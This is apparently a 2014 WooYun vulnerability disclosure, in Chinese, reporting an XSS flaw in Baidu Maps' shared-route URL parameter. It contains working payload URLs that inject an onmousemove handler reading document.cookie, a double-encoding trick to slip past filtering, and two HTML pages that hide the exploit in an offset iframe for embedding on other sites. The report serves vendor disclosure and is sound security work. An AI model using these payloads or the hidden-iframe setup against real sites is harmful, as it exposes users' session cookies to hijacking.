当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073258

漏洞标题:百度地图持久型XSS漏洞

相关厂商:百度

漏洞作者: q601333824

提交时间:2014-08-21 10:18

修复时间:2014-10-05 10:20

公开时间:2014-10-05 10:20

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-21: 细节已通知厂商并且等待厂商处理中
2014-08-21: 厂商已经确认,细节仅向厂商公开
2014-08-31: 细节向核心白帽子及相关领域专家公开
2014-09-10: 细节向普通白帽子公开
2014-09-20: 细节向实习白帽子公开
2014-10-05: 细节向公众公开

简要描述:

今天老师上课讲到ARP的原理,于是我把我的IP地址改成教室网关地址不知道有没有用.......

详细说明:

1.百度地图存在反射型XSS漏洞,但是被人利用,可以变成持久型XSS漏洞
2.存在XSS的连接

http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24<!XSS!>%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24


3.解码之后得到:

http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$


4.上面这个连接
是在搜索驾车路线,添加中途地点那个位置,如图

QQ截图20140821000220.png


5.这个地方如果直接在输入框添加代码,再点分享,会因为不存在这个地点出错,返回页面是空的,如图
(1)输入框输入字符串

2.png


(2)分享返回页面因不存在这个地点所以清空了。

空.png


---------------------------------------------------------------------------------------
6.这个时候可以搜索正确的地点,然后修改参数就不会清空了,如图
(1)搜索正确并且存在的地点

存在.png


(2)然后点击
分享地点,得到连接

http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24<!XSssssssssssssssS!>%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24


(3)然后把上面<!XSssssssssssssssS!>修改成XSS代码,就不会出现清空的情况了,如图
,这里的<span>标签没有对双引号过滤,存在XSS漏洞

没清空.png


------------------------------------------------------------------------------------
7.我自己的猜测的是,那个连接会获取你输入框的地方坐标,当你输入的地方不存在的时候,获取不到坐标,返回错误,又设置了返回错误清空内容,所以我自己猜测,如果事先先填写个对的地方,获取坐标,然后再修改参数就不会有影响

http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$


那些$$$$之间的参数,大概是地图上的坐标(纯属猜测)
---------------------------------------------------------------------------------
9.和上次一样,存在=等于号,就清空,所以编码两次就不会清空

= → %3d →%253d


http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24


8.这个地方XSS,太小,一般人不会去注意,所以创建了两个网页,代码如下
(1)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>中转</title>
</head>
<body>
<iframe src="http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24" height="900" width="1000" style="position:absolute; left:-900px; top:-670px;"></iframe>
</body>
</html>


第一段代码效果,如图:

修改1.png


(2)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>存储型SS测试</title>
</head>
<body>
<marquee behavior="alternate">→→→→→→→→→→<iframe src="http://fripside.sinaapp.com/1.php" width="50" height="30" scrolling="no"></iframe>←←←←←←←←←←</marquee>
</body>
</html>


配合第一个网页,第二段代码效果,如图:

修改2.png


9.上面两个代码的,说简单点就是,第一个网页,调整XSS位置和大小。
第一个网页iframe设置了绝对位置,不能随便移动,但是可以第二个网页设置嵌入第一个网页,就可以随意调整位置

10.最终效果,可以访问这个连接看效果,我设置了滚动效果,可以被人挂在网站当按钮使用

http://fripside.sinaapp.com/2.php


11.最终效果图

coo.png



漏洞证明:

(1)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>中转</title>
</head>
<body>
<iframe src="http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24" height="900" width="1000" style="position:absolute; left:-900px; top:-670px;"></iframe>
</body>
</html>


(2)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>存储型SS测试</title>
</head>
<body>
<marquee behavior="alternate">→→→→→→→→→→<iframe src="http://fripside.sinaapp.com/1.php" width="50" height="30" scrolling="no"></iframe>←←←←←←←←←←</marquee>
</body>
</html>


(3)最终效果图

coo.png


(4)可以访问这个连接看效果

http://fripside.sinaapp.com/2.php

修复方案:

过滤

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-08-21 16:52

厂商回复:

感谢提交,我们立即联系业务部门处理此问题。

最新状态:

暂无